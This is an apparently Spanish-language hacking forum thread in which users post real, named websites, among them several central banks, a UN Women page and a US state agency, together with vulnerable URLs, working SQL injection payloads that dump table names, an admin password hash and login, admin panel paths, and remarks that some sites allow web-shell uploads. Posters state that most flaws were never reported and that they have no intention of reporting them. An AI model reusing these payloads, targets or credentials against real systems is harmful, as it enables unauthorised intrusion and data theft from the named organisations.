• Auditoria Web

  • Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
 #293482  por MichBukana
 
Web: http://infrangelux.sytes.net

Bug: http://infrangelux.sytes.net/ScanX/?ip= ... 2michyB%3E

http://i51.tinypic.com/148m3yg.jpg

Descubridor: Er MichyBukana
no me permitía utilizar el < por lo que no pude hacer un XSS mas gracioso jeje.

Salu2!
 #312604  por CyRuX
 
Web:

http://www.dinebaltimore.com
http://www.muzikreviews.com
http://www.allanhouser.com
http://www.africasia.com
http://www.basketme.com
http://www.cupid.biz
http://www.apachecafe.info
http://wordtheatre.com
http://www.astroafricaeu.com
http://wordtheatre.com
http://www.unifem.org
http://hartmanarena.com
http://www.software.com.ec
http://www.inversionistasonora.com
http://score.dnr.sc.gov
http://www.stgeorgesbristol.co.uk
http://www.adrenalinelacrosse.com
http://www.worldmusicinstitute.org
http://www.highlandvillage.org
http://www.coorslightpr.com
http://www.maimonides.cl
http://www.magina.org
http://www.soloascenso.com.ar
http://www.galenored.com

=============================================

Bug:

http://www.dinebaltimore.com/review.php ... ----c:(web encontrada pass:aa844643126fb6fedcd012933b4ae494 login;admin. panel--C:http://www.jornadanet.com/Hemeroteca/
http://www.muzikreviews.com/reviews.php ... ----c:(web con 3 bases de datos y se encontro el el user y pass pero no se pudo decifrar)
http://www.allanhouser.com/newsDetail.p ... -C:(tablas encontradas pero hash no se puede crackear)
http://www.africasia.com/services/opini ... ----c:(web con todas las tablas pero no se encontro el login ni las pass..)
http://www.basketme.com/2.0/opinion.php ... ----c:(web con todas las tablas pero no se encontro el login ni las pass..)
http://www.cupid.biz/support/opinions.p ... ----c:(web con todas las tablas pero ninguna interesante.)
http://www.apachecafe.info/event.php?display=event&id='
http://wordtheatre.com/events/event.php?id='
http://www.astroafricaeu.com/event.php? ... ---------C: sacadas todas las tablas menos las del admin..!
http://wordtheatre.com/events/event.php?id='
http://www.unifem.org/cedaw30/events_ca ... ?EventID='
http://hartmanarena.com/event.php?id='
http://www.software.com.ec/noticiasver.php?id='
http://www.inversionistasonora.com/noti ... ,5,6,7,8--
http://score.dnr.sc.gov/deep.php?subject='
http://www.stgeorgesbristol.co.uk/event.php?pid='
http://www.adrenalinelacrosse.com/videos.php?cid='
http://www.worldmusicinstitute.org/event.php?id='
http://www.highlandvillage.org/event.php?id='
http://www.coorslightpr.com/event.php?id='
http://www.maimonides.cl/detalle_articu ... ,1,2,3,4,5
http://www.magina.org/noticias.php?id='
http://www.soloascenso.com.ar/noticias.php?id='
http://www.galenored.com/noticias.php?id='

=============================================
Metodo:
SQL,XSS
=============================================
Descubridor:
CyRuX
=============================================
Comentarios:
Ninguna fue reportado..!¬¬
pero todas esta con los datos necesario. Login: y Pass:
algunas tienen uplaod para la introduccion de 1 web-Shell
 #312728  por rhector123
 
wow !! eres un Maniaco CyRuX jajaj nada solo una Pequeña Broma Muy Buen Aporte CyRuX BUeno aki vamos :

Web: http://www.hankook.cl/

Bug: http://www.hankook.cl/detalle.php?id=133%

Panel: http://www.hankook.cl/admin/

Descubridor: rhector123

Metodo: SQL

Comentarios: Bueno reportado 5 veces sin respuestas Por eso lo hago Publico

otra cosa mas hay un bug mas, se puede saltar el logeo xD del admin
el administrador deberia poner mas interes en su seguridad xD bueno eso es todo.

un saludo Atte By rhector123
 #312795  por CyRuX
 
Web:
http://www.estrellasorientales.com.do
Bug:
Código: Seleccionar todo
http://www.estrellasorientales.com.do/noticias.php?id=-1+union+select+all+1,replace%28group_concat%28table_name%29,0x2C,0x3C62723E%29,3,4,5,6,7+from+information_schema.tables--
Panel:
http://www.estrellasorientales.com.do/cpanel/
Metodo:
SQL

Comentario:
No se ah reportado..! pondria los datos del admin
pero creo que seria demasiado..!

Network:iranserv Server
rc.iranserv.com
Channel : #iberoamerica
#Anonymous
#Honduras
 #312818  por CyRuX
 
WEB:
http://www.cac-acc.org

BUG:
Código: Seleccionar todo
http://www.cac-acc.org/news.php?id=-1+union+select+1,replace%28group_concat%28table_name%29,0x2C,0x3C62723E%29,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
Panel:
NO encontrado..!

Metodo:
SQL!

Descubridor:
CyRuX

Comentario:
No reportado..! Ni pienso hacerlo..!¬¬

=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=
Network:iranserv Server:rc.iranserv.com
Channel : #iberoamerica
#Anonymous
#Honduras
 #324029  por KHC
 
Banco de rusia:
http://www.cbr.ru/eng/bank( =notes_coins/base_of_memora‚ble_coins/e_coins1.asp?cat_‚num=5216-0060

Metodo: Asp Injection
 #324032  por KHC
 
Banco de Blangadesh:

http://www.bangladesh-bank( >org/aboutus/dept/dept_deta‚ils.php?callfrom=tababoutus‚&dept_id=74

PD: tiene errores logicos, y muy obvios para uqe no metan las manos donde no los kiddies!
 #324033  por KHC
 
Banco de Bolivia:

http://www.bcb.gob.bo/index 8.php?q=institucional/estad‚os_financieros&button2=Busc‚ar&mes=2011

Metodo: SQL Injection
Última edición por KHC el 10 Oct 2011, 04:16, editado 1 vez en total.
 #324036  por KHC
 
Banco Central de iraq:

http://www.cbi.iq/index.php ?pid=%22%3E%3Ca%20href=%22‚http://google.com%22%3EBe%2‚0Happy,%20click%20here%3C/h 1%3E
  • 1
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14